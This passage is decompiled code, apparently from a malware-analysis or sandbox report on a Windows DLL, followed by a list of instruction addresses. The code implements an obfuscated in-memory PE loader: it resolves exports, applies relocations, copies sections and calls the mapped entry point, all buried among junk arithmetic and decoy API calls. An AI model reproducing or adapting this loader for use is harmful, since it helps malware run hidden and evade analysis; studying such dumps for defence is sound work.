															asm("comiss xmm1, xmm0");
															if(__eflags >= 0) {
																_t501 = E6E4E8E30(E6E4B5EE0(0x16, _t819), _t500);
																asm("movaps xmm1, xmm0");
																asm("movsd [ebp-0x90], xmm0");
																asm("addsd xmm1, [ebp-0xdc]");
																asm("movss xmm0, [ebp-0xa4]");
																asm("cvtsd2ss xmm1, xmm1");
																asm("cvtss2sd xmm1, xmm1");
																asm("movsd [ebp-0xe4], xmm1");
																_t464 = E6E4E8E30(E6E4E8AFE(_t501), _t502);
																asm("mulsd xmm0, [ebp-0x90]");
																asm("movsd xmm1, [ebp-0xe4]");
																asm("movss xmm2, [0x6e4f9790]");
																asm("movss xmm3, [0x6e4f96bc]");
																asm("addsd xmm1, xmm0");
																asm("movss xmm0, [0x6e4f96d0]");
																asm("cvtpd2ps xmm1, xmm1");
															}
															continue;
														}
														do {
															_t503 = DestroyCaret();
															asm("movss xmm0, [ebp-0x20]");
															_t464 = E6E4E8AFE(_t503);
															_push(_t819);
															_push(_t464);
															E6E4B5A30();
															asm("movss xmm2, [0x6e4f9790]");
															_t914 = _t914 + 8;
															asm("cvtsd2ss xmm0, xmm0");
															asm("ucomiss xmm0, xmm2");
															asm("movss [ebp-0x20], xmm0");
															asm("movaps xmm1, xmm0");
															asm("lahf");
															__eflags = _t464 & 0x00000044;
														} while (__eflags != 0);
														asm("movss xmm0, [0x6e4f96d0]");
														asm("movss xmm3, [0x6e4f96bc]");
														goto L171;
													}
													_t900 = 0x4f;
													do {
														_t739 = _t739 * _t900;
														_t819 = _t819 + _t819;
														_t900 = _t819;
														_t464 = _t739 - _t900;
														__eflags = _t464;
														asm("movd xmm1, eax");
														asm("cvtdq2ps xmm1, xmm1");
														asm("comiss xmm0, xmm1");
													} while (_t464 > 0);
													_t886 = _v44;
													goto L167;
												}
												_t859 = _v40;
												asm("movss [ebp-0x1c], xmm1");
												_t815 = _v236( *((intOrPtr*)(_t859 + 0xc)) + _v48);
												_t498 =  *_t859 + _v48;
												_t860 = _v48;
												_t718 =  *((intOrPtr*)(_t859 + 0x10)) + _t860;
												__eflags = _t718;
												_v92 = _t815;
												_v68 = _t718;
												while(1) {
													_t719 =  *_t718;
													_v76 = _t498;
													__eflags = _t719;
													if(_t719 == 0) {
														break;
													}
													__eflags = _t498;
													if(_t498 == 0) {
														L179:
														__eflags = _t886 + _t886 - _v60;
														if(__eflags < 0) {
															asm("movss xmm1, [0x6e4f9668]");
															asm("comiss xmm1, [ebp-0x1c]");
															if(__eflags <= 0) {
																GetForegroundWindow();
																asm("movss xmm0, [0x6e4f972c]");
																_t520 = E6E4B5C20(_t719, _t815);
																asm("cvttss2si eax, xmm0");
																_t521 = _t520;
															} else {
																GetDialogBaseUnits();
																_t521 = 0x78;
															}
															asm("movd xmm0, eax");
															_t864 = 0x2a;
															asm("cvtdq2ps xmm0, xmm0");
															_v144 = 0;
															asm("comiss xmm0, [0x6e4f96d4]");
															asm("movss [ebp-0x1c], xmm0");
															if(__eflags < 0) {
																L187:
																asm("movss xmm1, [0x6e4f96a8]");
																asm("comiss xmm1, xmm0");
																if(__eflags > 0) {
																	_push(0);
																	_push(0x13);
																	E6E4B5A30();
																	asm("cvttsd2si eax, xmm0");
																	_t914 = _t914 + 8;
																	asm("movd xmm0, eax");
																	asm("cvtdq2ps xmm0, xmm0");
																	asm("movss [ebp-0x1c], xmm0");
																}
																asm("ucomiss xmm0, [0x6e4f970c]");
																asm("movss xmm1, [ebp-0xc8]");
																asm("movss [ebp-0x20], xmm1");
																asm("lahf");
																__eflags = _t521 & 0x00000044;
																if((_t521 & 0x00000044) != 0) {
																	L192:
																	_t822 = _v68;
																	L193:
																	_t860 = _v48;
																	L194:
																	__eflags = _t886 + 4 - _v156;
																	_v8 = 0xffffffff;
																	_t728 =  >  ? _t886 : _v112;
																	_t823 = _t822 + 4;
																	_t886 =  >  ? _t886 : _v112;
																	_v68 = _t823;
																	_t729 = _v76;
																	__eflags = _t729;
																	_t498 =  ==  ? _t729 : _t729 + 4;
																	_t718 = _t823;
																	_t815 = _v92;
																	continue;
																} else {
																	asm("movsd xmm0, [ebp-0x168]");
																	asm("movsd [ebp-0xb4], xmm0");
																	do {
																		__imp__GetSystemDefaultUILanguage();
																		asm("movss xmm0, [ebp-0x20]");
																		asm("addss xmm0, xmm0");
																		asm("movss [ebp-0x20], xmm0");
																		asm("cvtps2pd xmm0, xmm0");
																		asm("mulsd xmm0, [ebp-0xb4]");
																		asm("movsd [ebp-0xb4], xmm0");
																		asm("cvtpd2ps xmm0, xmm0");
																		asm("ucomiss xmm0, [0x6e4f970c]");
																		asm("movss [ebp-0x1c], xmm0");
																		asm("lahf");
																		__eflags = _t521 & 0x00000044;
																	} while ((_t521 & 0x00000044) != 0);
																	goto L192;
																}
															} else {
																_t320 = _t864 + 0x2e; // 0x58
																_t524 = E6E4E8E30(_t521, _t320);
																asm("cvtsd2ss xmm0, xmm0");
																_t321 = _t864 - 0x29; // 0x1
																asm("movss [ebp-0x20], xmm0");
																E6E4E8E30(_t524, _t321);
																asm("cvtsd2ss xmm0, xmm0");
																asm("movss [ebp-0x30], xmm0");
																do {
																	IsSystemResumeAutomatic();
																	_t528 = E6E4E8E30(E6E4B5D90(), _t527);
																	asm("movss xmm1, [ebp-0x20]");
																	_t864 = 1;
																	asm("cvtsd2ss xmm0, xmm0");
																	_v144 = 0;
																	asm("subss xmm1, xmm0");
																	asm("movss [ebp-0x1c], xmm0");
																	asm("movaps xmm0, xmm1");
																	_t521 = E6E4E8E30(E6E4E8AFE(_t528), _t529);
																	asm("xorps xmm1, xmm1");
																	asm("cvtsd2ss xmm1, xmm0");
																	asm("movss xmm0, [ebp-0x1c]");
																	asm("divss xmm0, [ebp-0x30]");
																	asm("movss [ebp-0x20], xmm1");
																	asm("mulss xmm0, xmm1");
																	asm("comiss xmm0, [0x6e4f96d4]");
																	asm("movss [ebp-0x1c], xmm0");
																} while (__eflags >= 0);
																goto L187;
															}
														}
														_t531 = _t719 + _t860;
														_v72 = _t531;
														_t533 = _v200(_t815, _t531 + 2);
														_t822 = _v68;
														 *_t822 = _t533;
														goto L194;
													}
													_t865 =  *_t498;
													__eflags = _t865;
													if(_t865 >= 0) {
														_t860 = _v48;
														goto L179;
													}
													asm("cdq");
													_t826 = _v92;
													__eflags = _t886 - _t815 >> 1 - _v156;
													_t736 =  >=  ? _t886 : _v112;
													_t886 =  >=  ? _t886 : _v112;
													_t822 = _v68;
													 *_t822 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v92 + 0x3c)) + _t826 + 0x78)) + _t826 + 0x1c)) + ((_t865 & 0x0000ffff) -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v92 + 0x3c)) + _t826 + 0x78)) + _t826 + 0x10))) * 4 + _t826)) + _t826;
													goto L193;
												}
												_t464 = _t886 + 4;
												_v44 = _t886;
												__eflags = _t464 - _v60;
												if(__eflags <= 0) {
													asm("movss xmm0, [0x6e4f9770]");
													asm("movss xmm1, [0x6e4f9690]");
													asm("movss [ebp-0x60], xmm0");
													asm("movss xmm0, [ebp-0x1c]");
													asm("comiss xmm1, xmm0");
													if(__eflags <= 0) {
														L200:
														asm("ucomiss xmm0, [0x6e4f971c]");
														asm("lahf");
														__eflags = _t464 & 0x00000044;
														if(__eflags == 0) {
															asm("movss xmm0, [0x6e4f9724]");
															_t509 = E6E4E8AFE(_t464);
															_push(_t815);
															_push(_t509);
															E6E4B5A30();
															asm("cvtsd2ss xmm0, xmm0");
															_t914 = _t914 + 8;
															asm("addss xmm0, [ebp-0xcc]");
															_t510 = E6E4E8AFE(_t509);
															_v144 = _t815;
															_t464 = E6E4B5EE0(_t510, _t815);
														}
														asm("movss xmm1, [ebp-0x18]");
														do {
															asm("movaps xmm0, xmm1");
															asm("addss xmm1, xmm0");
															asm("comiss xmm1, [0x6e4f9678]");
														} while (__eflags >= 0);
														asm("ucomiss xmm1, [0x6e4f973c]");
														asm("movss [ebp-0x1c], xmm1");
														asm("lahf");
														__eflags = _t464 & 0x00000044;
														if((_t464 & 0x00000044) == 0) {
															asm("movss xmm0, [0x6e4f97b8]");
															_t464 = E6E4E8E30(E6E4E8AFE(_t464), _t508);
															asm("xorps xmm1, xmm1");
															asm("cvtsd2ss xmm1, xmm0");
															asm("movaps xmm0, xmm1");
															asm("mulss xmm0, [0x6e4f97a8]");
															asm("subss xmm1, xmm0");
															asm("movss [ebp-0x1c], xmm1");
														}
														asm("ucomiss xmm1, [0x6e4f96a4]");
														asm("lahf");
														__eflags = _t464 & 0x00000044;
														if(__eflags == 0) {
															asm("movsd xmm0, [ebp-0xc0]");
															_t504 = E6E4E8CDF(_t464);
															_push(_t815);
															_push(_t504);
															E6E4B5A30();
															asm("cvttsd2si eax, xmm0");
															_t914 = _t914 + 8;
															asm("cdq");
															_t898 = _t815;
															_t815 = 0;
															_t351 = _t815 + 0x51; // 0x51
															_t505 = E6E4E8E30(_t504, _t351);
															asm("cvtsd2ss xmm0, xmm0");
															asm("subss xmm0, [0x6e4f9704]");
															_t464 = E6E4E8E30(E6E4E85B0(E6E4E8AFE(_t505), 0, _t504, _t898), _t507);
															asm("cvtsd2ss xmm0, xmm0");
															asm("xorps xmm1, xmm1");
															asm("cvtss2sd xmm1, xmm0");
															asm("movsd xmm0, [ebp-0x50]");
															asm("divsd xmm0, [ebp-0xd4]");
															asm("mulsd xmm1, xmm0");
															asm("cvtpd2ps xmm1, xmm1");
															asm("movss [ebp-0x1c], xmm1");
														}
														asm("movss xmm0, [0x6e4f96fc]");
														asm("movss xmm2, [0x6e4f9790]");
														asm("movss xmm3, [0x6e4f96bc]");
														_t886 = _v44;
														_t850 = _v40;
														_t697 = _v72;
														asm("movss [ebp-0x20], xmm0");
														asm("movss xmm0, [0x6e4f9678]");
														asm("comiss xmm0, xmm1");
														asm("movss xmm0, [0x6e4f96d0]");
														if(__eflags > 0) {
															do {
																_t464 = GetSystemDefaultLangID();
																asm("movss xmm1, [ebp-0x20]");
																asm("movss xmm2, [0x6e4f9678]");
																asm("movaps xmm0, xmm1");
																asm("addss xmm0, xmm1");
																asm("comiss xmm2, xmm0");
																asm("movaps xmm1, xmm0");
																asm("movss [ebp-0x20], xmm0");
																asm("movss [ebp-0x1c], xmm1");
															} while (__eflags > 0);
															_t886 = _v44;
															_t850 = _v40;
															_t697 = _v72;
															asm("movss xmm0, [0x6e4f96d0]");
															asm("movss xmm3, [0x6e4f96bc]");
															asm("movss xmm2, [0x6e4f9790]");
														}
														continue;
													}
													_t511 = E6E4E8E30(_t464, 1);
													asm("cvtsd2ss xmm0, xmm0");
													_t821 = 0;
													__eflags = 0;
													_t343 = _t821 + 2; // 0x2
													_t725 = _t343;
													asm("movss [ebp-0x20], xmm0");
													_t512 = E6E4E8E30(_t511, _t343);
													asm("movss xmm1, [ebp-0x60]");
													asm("cvtsd2ss xmm0, xmm0");
													asm("movss [ebp-0x54], xmm0");
													do {
														asm("movss xmm0, [ebp-0x20]");
														asm("subss xmm0, xmm1");
														_t513 = E6E4E8AFE(_t512);
														asm("movss xmm0, [ebp-0x60]");
														E6E4B5C20(_t725, _t821);
														asm("movss [ebp-0x60], xmm0");
														asm("movss xmm0, [ebp-0x54]");
														_t517 = E6E4E8E30(E6E4E8AFE(E6E4B5C20(_t725, _t821)), _t516);
														asm("cvtsd2ss xmm0, xmm0");
														_t725 = _t513;
														asm("movss [ebp-0x54], xmm0");
														_t512 = E6E4E8E30(_t517, _t513);
														asm("movss xmm1, [ebp-0x60]");
														asm("movss xmm2, [0x6e4f9690]");
														asm("cvtsd2ss xmm0, xmm0");
														asm("mulss xmm0, xmm1");
														asm("mulss xmm0, [ebp-0x54]");
														asm("addss xmm0, [ebp-0x20]");
														asm("comiss xmm2, xmm0");
													} while (__eflags > 0);
													goto L200;
												}
												_t697 = _v72;
												_t850 = _v40 + 0x14;
												goto L157;
											}
											asm("movsd xmm0, [ebp-0x50]");
											_t851 = 1;
											_t887 = __imp__GetTickCount64;
											asm("movsd [ebp-0xd4], xmm0");
											asm("movsd xmm0, [0x6e4f9548]");
											asm("movsd [ebp-0xb4], xmm0");
											do {
												_t465 =  *_t887();
												asm("movsd xmm0, [ebp-0xd4]");
												asm("mulsd xmm0, [ebp-0xac]");
												asm("addsd xmm0, [ebp-0x170]");
												asm("movsd [ebp-0xd4], xmm0");
												E6E4E8DF0(E6E4E81A0(_t465, _t815, 0x2710, 0), _t466, _t815);
												asm("movsd xmm1, [ebp-0xd4]");
												_t851 = _t851 + 1;
												__eflags = _t851;
												asm("mulsd xmm1, xmm0");
												asm("movsd xmm0, [ebp-0x88]");
												asm("mulsd xmm1, [ebp-0xb4]");
												asm("addsd xmm0, xmm1");
												asm("movsd xmm1, [ebp-0x10c]");
												asm("movsd [ebp-0x88], xmm0");
												asm("movd xmm0, edi");
												asm("cvtdq2pd xmm0, xmm0");
												asm("comisd xmm1, xmm0");
												asm("movsd [ebp-0xd4], xmm0");
											} while (_t851 >= 0);
											_t468 = _v96;
											_t699 = _v48;
											_t888 = _v44;
											_t853 = _t699 -  *((intOrPtr*)(_t468 + 0x34));
											__eflags =  *(_t468 + 0xa4);
											_v52 = _t853;
											if( *(_t468 + 0xa4) == 0) {
												L245:
												_t889 = 1;
												do {
													__imp__GetTickCount64();
													asm("movsd xmm0, [ebp-0x50]");
													asm("mulsd xmm0, [ebp-0xac]");
													asm("addsd xmm0, [ebp-0x170]");
													asm("movsd [ebp-0x50], xmm0");
													_t468 = E6E4E8DF0(E6E4E81A0(_t468, _t815, 0x2710, 0), _t469, _t815);
													asm("movsd xmm1, [ebp-0x50]");
													_t889 = _t889 + 1;
													__eflags = _t889;
													asm("mulsd xmm1, xmm0");
													asm("movsd xmm0, [ebp-0x88]");
													asm("mulsd xmm1, [ebp-0xb4]");
													asm("addsd xmm0, xmm1");
													asm("movsd xmm1, [ebp-0x10c]");
													asm("movsd [ebp-0x88], xmm0");
													asm("movd xmm0, esi");
													asm("cvtdq2pd xmm0, xmm0");
													asm("comisd xmm1, xmm0");
													asm("movsd [ebp-0x50], xmm0");
												} while (_t889 >= 0);
												_t854 = _v48;
												 *0x6e501484 = _t854;
												_t891 =  *((intOrPtr*)(_v96 + 0x28)) + _t854;
												_v8 = 0xffffffff;
												__eflags = _v444;
												if(_v444 != 0) {
													_t471 =  *_t891(_v412, 1, 0);
													L255:
													asm("movsd xmm0, [ebp-0x88]");
													E6E4E8CC1(_t471);
													L253:
													 *[fs:0x0] = _v16;
													__eflags = _v24 ^ _t912;
													return E6E4C4D4A(_v24 ^ _t912);
												}
												_t471 = E6E4B6550(_t854, _v440);
												_v52 = _t471;
												__eflags = _t471;
												if(_t471 == 0) {
													goto L255;
												}
												__eflags = _v416;
												if(_v416 == 0) {
													_t856 = _v412;
												} else {
													_t856 = _v412;
													E6E4B6510(_t856, _t854);
												}
												 *_t891(_t856, 1, 0);
												_v52(_v432, _v428, _v424, _v420);
												goto L253;
											}
											asm("movss xmm1, [ebp-0x1c]");
											__eflags = _t888 - _v60;
											if(__eflags == 0) {
												asm("comiss xmm1, [ebp-0x78]");
												_t893 = 0x37;
												if(__eflags < 0) {
													L221:
													_t468 = _v40;
													asm("o16 nop [eax+eax]");
													while(1) {
														L222:
														_t707 =  *(_t468 + 4);
														__eflags = _t707;
														if(_t707 == 0) {
															goto L245;
														}
														_t370 = _t468 + 8; // 0x100000007
														_t894 = _t370;
														_t815 =  *_t468 + _v48;
														_t709 = _t707 + 0xfffffff8 >> 1;
														__eflags = _t709;
														while(1) {
															_v36 = _t894;
															_t710 = _t709 - 1;
															__eflags = _t709;
															_t479 = _v44;
															_v52 = _t709 - 1;
															if(_t709 == 0) {
																break;
															}
															__eflags = _t479 + 4 - _v156;
															_t486 =  *_t894 & 0x0000ffff;
															_t712 =  >  ? _v44 : _v112;
															_t896 = _t486 >> 0xc;
															_v44 =  >  ? _v44 : _v112;
															_t713 = _t486;
															__eflags = _t896 - 0xa;
															if(_t896 != 0xa) {
																__eflags = _t896 - 3;
																if(_t896 != 3) {
																	__eflags = _t896 - 1;
																	if(_t896 != 1) {
																		__eflags = _t896 - 2;
																		if(_t896 == 2) {
																			_t714 = _t713 & 0x00000fff;
																			_t385 = _t714 + _t815;
																			 *_t385 =  *(_t714 + _t815) + _t853;
																			__eflags =  *_t385;
																		}
																	} else {
																		 *((intOrPtr*)((_t713 & 0x00000fff) + _t815)) =  *((intOrPtr*)((_t713 & 0x00000fff) + _t815)) + (_t853 >> 0x10);
																	}
																} else {
																	 *((intOrPtr*)((_t713 & 0x00000fff) + _t815)) =  *((intOrPtr*)((_t713 & 0x00000fff) + _t815)) + _t853;
																}
															} else {
																 *((intOrPtr*)((_t486 & 0x00000fff) + _t815)) =  *((intOrPtr*)((_t486 & 0x00000fff) + _t815)) + _t853;
															}
															_t709 = _v52;
															_t894 = _v36 + 2;
															_v8 = 0xffffffff;
														}
														_t480 = _t479 + _t479;
														__eflags = _t480 - _v60;
														if(__eflags < 0) {
															asm("movsd xmm3, [0x6e4f9670]");
															asm("movsd [ebp-0xdc], xmm3");
															asm("movsd xmm3, [0x6e4f9680]");
															asm("movsd [ebp-0x90], xmm3");
															while(1) {
																asm("movss xmm2, [0x6e4f9780]");
																asm("comiss xmm1, xmm2");
																asm("movss xmm4, [0x6e4f9744]");
																asm("movss xmm0, [0x6e4f96e0]");
																if(__eflags > 0) {
																	__imp__GetErrorMode();
																	_t815 = _t815 | 0xffffffff;
																	_t710 = _t815 - 0x27;
																	_t480 = E6E4E8E30(_t480, _t815 - 0x27);
																	asm("movss xmm4, [0x6e4f9744]");
																	asm("xorps xmm1, xmm1");
																	asm("cvtsd2ss xmm1, xmm0");
																	asm("movss xmm0, [0x6e4f96e0]");
																}
																asm("movss xmm2, [0x6e4f96a0]");
																asm("ucomiss xmm1, xmm0");
																asm("lahf");
																__eflags = _t480 & 0x00000044;
																if(__eflags != 0) {
																	goto L242;
																}
																asm("movss [ebp-0x20], xmm4");
																do {
																	asm("cvttss2si ecx, xmm2");
																	_t710 = E6E4B5EE0(_t710, _t815);
																	_t483 = E6E4E8E30(_t482, _t482);
																	asm("xorps xmm2, xmm2");
																	asm("cvtsd2ss xmm2, xmm0");
																	asm("movss xmm0, [ebp-0x20]");
																	asm("subss xmm0, xmm2");
																	asm("movaps xmm1, xmm2");
																	asm("cvttss2si ecx, xmm0");
																	asm("movaps xmm0, xmm2");
																	asm("subss xmm0, xmm2");
																	asm("cvttss2si eax, xmm0");
																	asm("movd xmm0, ecx");
																	asm("cvtdq2ps xmm0, xmm0");
																	_t480 = _t483;
																	asm("movd xmm3, eax");
																	asm("divss xmm1, xmm0");
																	asm("cvtdq2ps xmm3, xmm3");
																	asm("addss xmm1, xmm3");
																	asm("movss [ebp-0x20], xmm3");
																	asm("ucomiss xmm1, [0x6e4f96e0]");
																	asm("lahf");
																	__eflags = _t480 & 0x00000044;
																} while (__eflags != 0);
																L242:
																asm("movss xmm0, [0x6e4f96d4]");
																asm("comiss xmm0, xmm1");
																if(__eflags <= 0) {
																	__imp__CoFreeUnusedLibraries();
																	asm("movss xmm1, [0x6e4f97c8]");
																} else {
																	_t710 = 0x16;
																	_t481 = E6E4B5EE0(0x16, _t815);
																	asm("movsd xmm1, [ebp-0xdc]");
																	_t480 = _t481;
																	asm("movd xmm0, eax");
																	asm("cvtdq2pd xmm0, xmm0");
																	asm("divsd xmm1, xmm0");
																	asm("movsd xmm0, [ebp-0x90]");
																	asm("subsd xmm0, xmm1");
																	asm("cvtpd2ps xmm1, xmm0");
																}
															}
														}
														_t468 = _v40 +  *((intOrPtr*)(_v40 + 4));
														_v40 = _t468;
													}
													goto L245;
												}
												_t857 = 0;
												__eflags = 0;
												do {
													TlsAlloc();
													_push(_t857);
													_push(_t893);
													E6E4B5A30();
													asm("cvttsd2si ecx, xmm0");
													_t914 = _t914 + 8;
													asm("movsd [ebp-0xdc], xmm0");
													_t893 = E6E4B5EE0(_t699, _t815);
													_t857 = _t815;
													_t699 = _t893;
													E6E4E8E30(_t491, _t893);
													asm("movsd xmm1, [ebp-0xdc]");
													asm("divsd xmm1, xmm0");
													asm("cvtpd2ps xmm1, xmm1");
													asm("comiss xmm1, [ebp-0x78]");
												} while (__eflags >= 0);
												_t853 = _v52;
												goto L221;
											}
											_t468 =  *((intOrPtr*)(_t468 + 0xa0)) + _t699;
											_v40 = _t468;
											goto L222;
										}
									}
								}
								asm("movss xmm1, [0x6e4f96d8]");
								_t866 = _t848 + 0x2c;
								__eflags = _t866;
								_t827 = 0x2d;
								do {
									_t543 = _t462 - 1;
									_v92 = _t543;
									__eflags = _v44 - _v60;
									if(_v44 < _v60) {
										asm("movss xmm0, [ebp-0x1c]");
										asm("ucomiss xmm0, xmm1");
										asm("lahf");
										__eflags = _t543 & 0x00000044;
										if((_t543 & 0x00000044) != 0) {
											_push(0);
											_push(0x58);
											E6E4B5A30();
											_t544 = E6E4E8CDF(_t543);
											_push(_t827);
											_push(_t544);
											E6E4B5A30();
											_t914 = _t914 + 0x10;
										} else {
											_t259 = 0x58 * _t827;
											_t827 = 0x58 * _t827 >> 0x20;
											E6E4E8E30(_t259, _t259);
											asm("cvtsd2ss xmm0, xmm0");
											E6E4B5C20(_t259, _t827);
										}
										asm("movss xmm0, [0x6e4f96b0]");
										asm("movss xmm2, [0x6e4f9778]");
										asm("movss [ebp-0x20], xmm0");
										asm("movss [ebp-0x48], xmm2");
										do {
											__imp__CoUninitialize();
											asm("cvttss2si ecx, [ebp-0x20]");
											_t545 = E6E4B5D90();
											asm("cdq");
											_push(_t827);
											_push(_t545);
											E6E4B5A30();
											asm("cvttsd2si eax, xmm0");
											_t914 = _t914 + 8;
											_v52 = _t545;
											E6E4E8E30(E6E4B5EE0(_t545, _t827), _t546);
											asm("xorps xmm3, xmm3");
											asm("cvtsd2ss xmm3, xmm0");
											asm("movss xmm0, [ebp-0x48]");
											asm("subss xmm0, xmm3");
											asm("movss [ebp-0x20], xmm3");
											asm("cvttss2si eax, xmm0");
											asm("movaps xmm0, xmm3");
											asm("movd xmm2, eax");
											asm("cdq");
											_t266 = _t545 % _v52;
											__eflags = _t266;
											_t827 = _t266;
											asm("cvtdq2ps xmm2, xmm2");
											asm("movd xmm1, eax");
											asm("cvtdq2ps xmm1, xmm1");
											asm("mulss xmm0, xmm2");
											asm("movss [ebp-0x48], xmm2");
											asm("subss xmm1, xmm0");
											asm("movss xmm0, [ebp-0x54]");
											asm("comiss xmm0, xmm1");
											asm("movss [ebp-0x1c], xmm1");
										} while (_t266 > 0);
										asm("movss xmm1, [0x6e4f96d8]");
										_t462 = _v92;
										goto L153;
									}
									_t748 =  *((intOrPtr*)(_t866 - 8)) + _v48;
									_t829 =  *_t866 + _v188;
									_t902 =  *(_t866 - 4);
									__eflags = _t902;
									if(_t902 == 0) {
										L146:
										_t866 = _t866 + 0x28;
										goto L153;
									} else {
										goto L144;
									}
									do {
										L144:
										_t555 =  *_t829;
										_t829 = _t829 + 1;
										 *_t748 = _t555;
										_t748 = _t748 + 1;
										_t902 = _t902 - 1;
										__eflags = _t902;
									} while (_t902 != 0);
									_t462 = _v92;
									goto L146;
									L153:
									_t827 = 0x2d;
									__eflags = _t462;
								} while (_t462 != 0);
								goto L154;
							}
						} else {
							goto L129;
						}
						do {
							L129:
							_t880 = _t880 - 1;
							__eflags = _t691 - _t815;
							if(_t691 > _t815) {
								__imp__GetTickCount64();
								_t749 = _v36;
								_t456 =  *_t844;
								_t844 = _t844 + 1;
								_t815 = _v60;
								 *_t749 = _t456;
								_t750 = _t749 + 1;
								__eflags = _t750;
								_v36 = _t750;
								_t691 = _v44;
							}
							__eflags = _t880;
						} while (_t880 != 0);
						goto L132;
					}
					L256:
					_t842 = _t842 - 1;
					_v188 = _t842;
					_v332 = _t842;
				}
			}

0x6e4b6620
0x6e4b6623
0x6e4b6625
0x6e4b6630
0x6e4b6631
0x6e4b6637
0x6e4b663c
0x6e4b663e
0x6e4b6642
0x6e4b6644
0x6e4b6645
0x6e4b6648
0x6e4b664e
0x6e4b6651
0x6e4b6655
0x6e4b665c
0x6e4b6660
0x6e4b6667
0x6e4b666b
0x6e4b6672
0x6e4b6675
0x6e4b667a
0x6e4b669b
0x6e4b6683
0x6e4b6683
0x6e4b668f
0x6e4b6697
0x6e4b6697
0x6e4b66a0
0x6e4b66a5
0x6e4b66c6
0x6e4b66cb
0x6e4b66cf
0x6e4b66d2
0x6e4b66d5
0x6e4b66d7
0x6e4b66da
0x6e4b66dd
0x6e4b66e3
0x6e4b66e9
0x6e4b66ee
0x6e4b66f3
0x6e4b66f8
0x6e4b6700
0x6e4b6708
0x6e4b6710
0x6e4b6718
0x6e4b6720
0x6e4b6728
0x6e4b6730
0x6e4b6738
0x6e4b673e
0x6e4b6744
0x6e4b674a
0x6e4b6750
0x6e4b6753
0x6e4b6759
0x6e4b675c
0x6e4b6764
0x6e4b676c
0x6e4b6772
0x6e4b6778
0x6e4b6780
0x6e4b6786
0x6e4b678e
0x6e4b6791
0x6e4b6798
0x6e4b679e
0x6e4b67a1
0x6e4b67a1
0x6e4b67a7
0x6e4b67b5
0x00000000
0x00000000
0x6e4b67bb
0x6e4b67be
0x6e4b67c6
0x00000000
0x00000000
0x6e4b67cc
0x6e4b67ce
0x6e4b67d1
0x6e4b67dd
0x00000000
0x00000000
0x6e4b67e3
0x6e4b67e6
0x6e4b67ed
0x6e4b67f4
0x6e4b67fc
0x6e4b67ff
0x6e4b6805
0x6e4b680f
0x6e4b6848
0x6e4b6850
0x6e4b6858
0x6e4b685d
0x6e4b6862
0x6e4b6865
0x6e4b686a
0x6e4b6872
0x6e4b6873
0x6e4b6876
0x6e4b691b
0x6e4b691b
0x6e4b691f
0x6e4b6923
0x6e4b6923
0x6e4b6a04
0x6e4b6a04
0x6e4b6a11
0x6e4b6a14
0x6e4b6a19
0x6e4b6a1e
0x6e4b6a23
0x6e4b6a5a
0x6e4b6a5a
0x6e4b6a5d
0x00000000
0x6e4b6a25
0x6e4b6a25
0x6e4b6a30
0x6e4b6a30
0x6e4b6a34
0x6e4b6a35
0x6e4b6a36
0x6e4b6a37
0x6e4b6a3c
0x6e4b6a40
0x6e4b6a43
0x6e4b6a47
0x6e4b6a4a
0x6e4b6a4e
0x6e4b6a53
0x6e4b6a53
0x00000000
0x6e4b6a30
0x6e4b6927
0x6e4b6927
0x6e4b6935
0x6e4b693e
0x6e4b693f
0x6e4b6940
0x6e4b6941
0x6e4b6949
0x6e4b694c
0x6e4b6956
0x6e4b695b
0x6e4b6960
0x6e4b6963
0x6e4b6966
0x6e4b6969
0x6e4b696c
0x6e4b696d
0x6e4b6973
0x6e4b697c
0x6e4b6980
0x6e4b6983
0x6e4b698a
0x6e4b698b
0x6e4b698e
0x00000000
0x6e4b6990
0x6e4b6990
0x6e4b6997
0x6e4b69d2
0x6e4b69e4
0x6e4b69e9
0x6e4b69f1
0x6e4b69f4
0x6e4b69f8
0x6e4b6a00
0x6e4b6999
0x6e4b6999
0x6e4b69a1
0x6e4b69a6
0x6e4b69a7
0x6e4b69a8
0x6e4b69ad
0x6e4b69b5
0x6e4b69b8
0x6e4b69bc
0x6e4b69c0
0x6e4b69c8
0x6e4b69c8
0x00000000
0x6e4b6997
0x6e4b687c
0x6e4b687c
0x6e4b6884
0x6e4b6890
0x6e4b6890
0x6e4b6894
0x6e4b6899
0x6e4b68a0
0x6e4b68a4
0x6e4b68a8
0x6e4b68ac
0x6e4b68b1
0x6e4b68b6
0x6e4b68bb
0x6e4b68c0
0x6e4b68c3
0x6e4b68c7
0x6e4b68cb
0x6e4b68d3
0x6e4b68d7
0x6e4b68db
0x6e4b68e0
0x6e4b68e4
0x6e4b68e7
0x6e4b68ea
0x6e4b68ee
0x6e4b68f2
0x6e4b68f6
0x6e4b68fa
0x6e4b6902
0x6e4b6906
0x6e4b690a
0x6e4b6911
0x6e4b6912
0x6e4b6912
0x00000000
0x6e4b6890
0x6e4b6811
0x6e4b6811
0x6e4b6814
0x6e4b681c
0x6e4b6824
0x6e4b6827
0x6e4b682a
0x6e4b6830
0x6e4b6833
0x6e4b683b
0x6e4b6a60
0x6e4b6a60
0x6e4b6a69
0x6e4b6a71
0x6e4b6a79
0x6e4b6a7e
0x6e4b6a86
0x6e4b6a8e
0x6e4b6a96
0x6e4b6a9e
0x6e4b6aa6
0x6e4b6aae
0x6e4b6ab6
0x6e4b6abb
0x6e4b6ac3
0x6e4b6acb
0x6e4b6ad3
0x6e4b6adb
0x6e4b6ae3
0x6e4b6aeb
0x6e4b6af3
0x6e4b6afb
0x6e4b6b03
0x6e4b6b0b
0x6e4b6b13
0x6e4b6b1b
0x6e4b6b23
0x6e4b6b2b
0x6e4b6b33
0x6e4b6b38
0x6e4b6b40
0x6e4b6b48
0x6e4b6b50
0x6e4b6b58
0x6e4b6b60
0x6e4b6b68
0x6e4b6b70
0x6e4b6b75
0x6e4b6b7d
0x6e4b6b85
0x6e4b6b8d
0x6e4b6b95
0x6e4b6b9d
0x6e4b6ba5
0x6e4b6bad
0x6e4b6bb5
0x6e4b6bbd
0x6e4b6bc5
0x6e4b6bcd
0x6e4b6bd5
0x6e4b6bdd
0x6e4b6be2
0x6e4b6bea
0x6e4b6bf2
0x6e4b6bfa
0x6e4b6c03
0x6e4b6c0b
0x6e4b6c13
0x6e4b6c1c
0x6e4b6c24
0x6e4b6c2c
0x6e4b6c38
0x6e4b6c3b
0x6e4b6c43
0x6e4b6fb9
0x6e4b6fb9
0x6e4b6fbf
0x00000000
0x00000000
0x6e4b6fcb
0x6e4b6fe5
0x6e4b6fe8
0x6e4b6ff2
0x6e4b7000
0x6e4b7005
